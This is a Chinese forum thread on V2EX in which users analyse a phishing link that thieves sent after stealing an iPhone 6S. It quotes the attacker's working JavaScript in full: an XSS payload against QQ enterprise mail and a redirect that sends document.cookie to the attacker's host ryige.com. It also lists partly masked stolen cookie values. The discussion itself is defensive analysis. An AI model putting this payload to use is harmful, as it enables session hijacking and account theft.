V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
saxon
V2EX  ›  问与答

朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID

  •  1
     
  •   saxon · 2015-11-02 13:32:21 +08:00 · 7893 次点击
    这是一个创建于 3345 天前的主题,其中的信息可能已经有所发展或是发生改变。

    http://eeee.washbowl.com.cn/
    这个是个挂马地址,请各位大师分析一下
    如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?

    第 1 条附言  ·  2015-11-02 18:07:59 +08:00
    有什么信息可以追踪到写这个 scirpt 的人么...这个网站的主机和 DNS 是?
    第 2 条附言  ·  2015-11-03 14:01:20 +08:00
    提醒:不要用 IPHONE 打开浏览器链接!!!!!!!!
    38 条回复    2016-07-08 21:18:26 +08:00
    paradoxs
        1
    paradoxs  
       2015-11-02 13:35:24 +08:00 via iPhone
    jedyu
        2
    jedyu  
       2015-11-02 13:42:28 +08:00
    手贱点了进去,一堆信息被上传了
    ScotGu
        3
    ScotGu  
       2015-11-02 13:44:08 +08:00
    @jedyu 感谢你去趟雷~~ 我就不点了。
    saxon
        4
    saxon  
    OP
       2015-11-02 13:44:13 +08:00
    @jedyu 我正在分析=-= 有一段 js 应该是用 cookie 去登 QQ 企业邮箱
    jedyu
        5
    jedyu  
       2015-11-02 13:51:29 +08:00
    @ScotGu
    @saxon
    是的,企业邮箱、个人邮箱、 QQ 号码及一堆 Cookie 都被传上去了。

    扫了一下注入点,然后发现服务器挂了
    saxon
        6
    saxon  
    OP
       2015-11-02 13:53:07 +08:00
    @jedyu 能获得一些额外的信息么
    WenJimmy
        7
    WenJimmy  
       2015-11-02 13:53:58 +08:00
    不敢点
    jedyu
        8
    jedyu  
       2015-11-02 14:00:32 +08:00
    @saxon

    c=wxstaytime=1423741712;
    idqq_account=theCanChange=1;
    theShowUin=145xxxxxx;
    [email protected];
    EmailCanSeach=1;
    EmailIsActive=1;
    UinCanSeach=1;
    shouldshowmail=1;
    firstsetidqq=1;
    MSK=0;;
    verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba;
    qz_gdt=m6uqgvwxxxxxxq4ezk4ka;
    qqmusic_uin=;
    qqmusic_key=;
    qqmusic_fromtag=;
    new_mail_num=14xxxxxx8&1;
    qm_flag=0;
    [email protected];
    sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.;
    biz_username=261xxxxxx;
    CCSHOW=0000;
    username=140761208&1403227908|-16342184644&261233652;
    ssl_edition=b31.exmail.qq.com;
    Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx;
    Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx;
    _ga=GA1.3.1469923463.1445309872;
    qm_username=14xxxxxx;
    qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.;
    RK=CEeuCexxGR;
    pt_clientip=133b3c0cxxxxxx4f;
    pt_serverip=b7ff0abfxxxxxx60;
    pt2gguin=o0014xxxxxx;
    uin=o0014xxxxxx;
    skey=@uF8W0XXXc;
    ptisp=cnc;
    ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985;
    pgv_info=ssid=s776441213&pgvReferrer=;
    pgv_pvid=775212126;
    o_cookie=14xxxxxx;
    uid=12xxxxxx;
    dc_vplaying=0;
    tinfo=14xxxxxx.0000*;
    wimrefreshrun=0&;
    autologin=n

    &u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html
    jedyu
        9
    jedyu  
       2015-11-02 14:11:20 +08:00
    @jedyu 然后,我的 IP 好像也被 ban 了
    kikyous
        10
    kikyous  
       2015-11-02 14:13:52 +08:00
    <script>
    function test(PARAMS) {
    var temp = document.createElement("form");
    temp.acceptCharset = "utf-8";
    //By Wfox
    temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
    var opt = document.createElement("textarea");
    opt.name = x;
    opt.value = PARAMS[x];
    temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    }
    test({
    uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
    });
    </script>
    谁来讲解一下, qq.com 的 cookie 不是被 post 到腾讯的服务器了吗?他们是怎么得到的?
    laydown
        11
    laydown  
       2015-11-02 14:27:02 +08:00
    我没看正文直接点了,我要不要重装系统啊?!!!
    soolby
        12
    soolby  
       2015-11-02 14:28:17 +08:00
    定期改一下密码复杂一点。
    把你的提示问题的答案设置的复杂一点(记得备份)
    aliuwr
        13
    aliuwr  
       2015-11-02 14:28:55 +08:00
    估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918
    10-08 就确认了,还没修复。不知道是不好修复,还是不够重视。 rank 也只给 1 ,真没意思。

    @laydown 速度改 QQ 密码就好了。
    laydown
        14
    laydown  
       2015-11-02 14:30:19 +08:00
    @aliuwr Mac 系统,也没装 QQ ,应该没事吧?
    squid157
        15
    squid157  
       2015-11-02 14:33:19 +08:00 via iPhone
    @laydown 看前面回复 似乎是偷 cookie 这就不好说了
    skyun
        16
    skyun  
       2015-11-02 14:45:13 +08:00
    手贱。直接点进去了。。。
    wgf2008
        17
    wgf2008  
       2015-11-02 14:46:55 +08:00
    D 它
    ScotGu
        18
    ScotGu  
       2015-11-02 14:48:47 +08:00
    既然这个网站可以直接获取 cookies
    那么每天上网百度出的一堆垃圾站也可能用这招,只是没有这个有针对性。
    看来用邮件客户端很有必要啊。
    Tuibimba
        19
    Tuibimba  
       2015-11-02 14:55:37 +08:00 via Android
    我的 iphone 被偷了后也收到过这类链接
    点进去后发现不对劲 立马把相关密码都改了
    BOYPT
        20
    BOYPT  
       2015-11-02 14:57:26 +08:00


    在匿名模式打开看了下,自动去刷一大堆常见网站,看来有漏用户信息漏洞的公共网站不少啊
    wdlth
        21
    wdlth  
       2015-11-02 14:57:47 +08:00   ❤️ 1
    用的阿里云……
    wohenyingyu01
        22
    wohenyingyu01  
       2015-11-02 15:00:18 +08:00
    网址点进去后发现是个新闻网站。。。
    Evi1m0
        23
    Evi1m0  
       2015-11-02 15:17:27 +08:00
    @BOYPT

    两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。

    另外一个 iframe 是进行攻击者的操作:

    <iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

    <iframe src="/htmlpage5.html" style="display:none"></iframe>

    ---------------

    function test(PARAMS) {
    var temp = document.createElement("form");
    temp.acceptCharset = "utf-8";
    //By Wfox
    temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
    var opt = document.createElement("textarea");
    opt.name = x;
    opt.value = PARAMS[x];
    temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    }
    test({
    uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
    });


    document.domain="qq.com";
    window.onload=documentrrady;
    function documentrrady(){
    window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
    };
    BOYPT
        24
    BOYPT  
       2015-11-02 15:24:43 +08:00
    比较好奇的是,往 qq 的 login post 一下,然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了??
    skyun
        25
    skyun  
       2015-11-02 15:44:14 +08:00
    吓得我赶紧改了 QQ 密码,清空了浏览器 cookie ,往常用网站上重新登陆了次,刷新了 cookie 。。。这样就没事了吧?
    Sleebi
        26
    Sleebi  
       2015-11-02 15:47:36 +08:00
    这次还好忍住了,先看评论,保命
    Evi1m0
        27
    Evi1m0  
       2015-11-02 15:58:08 +08:00
    嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
    Smirnoff
        28
    Smirnoff  
       2015-11-02 16:06:59 +08:00
    @Evi1m0 蘑菇君?
    yksoft1
        29
    yksoft1  
       2015-11-02 17:24:25 +08:00
    用虚拟机开,发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事
    ChoateYao
        30
    ChoateYao  
       2015-11-02 17:35:11 +08:00
    难道我去慢了,打开只有一个 IIS 的图标什么事情都没有发生。
    saxon
        31
    saxon  
    OP
       2015-11-02 18:08:50 +08:00
    @skyun 个人认为密码还是窃取不到的..
    saxon
        32
    saxon  
    OP
       2015-11-02 18:14:55 +08:00
    @wohenyingyu01 并不是 只是挂了一个 iframe
    RHFS
        33
    RHFS  
       2015-11-02 18:52:41 +08:00
    你还是提醒一下别人别乱点链接吧。。。
    我觉得很多人点玩看了评论都吓到了
    curiosity
        34
    curiosity  
       2015-11-02 19:39:18 +08:00
    我擦...点开了...有什么补救方法嘛!
    Evi1m0
        35
    Evi1m0  
       2015-11-02 19:47:04 +08:00   ❤️ 1
    saxon
        36
    saxon  
    OP
       2015-11-03 14:01:38 +08:00
    @RHFS 提醒了
    saxon
        37
    saxon  
    OP
       2015-11-03 14:02:10 +08:00
    @curiosity 如果担心,可以改个 QQ 密码就行了
    DevineRapier
        38
    DevineRapier  
       2016-07-08 21:18:26 +08:00
    @kikyous web 第一课: cookie 在本地, session 在服务器
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2792 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 12:30 · PVG 20:30 · LAX 04:30 · JFK 07:30
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.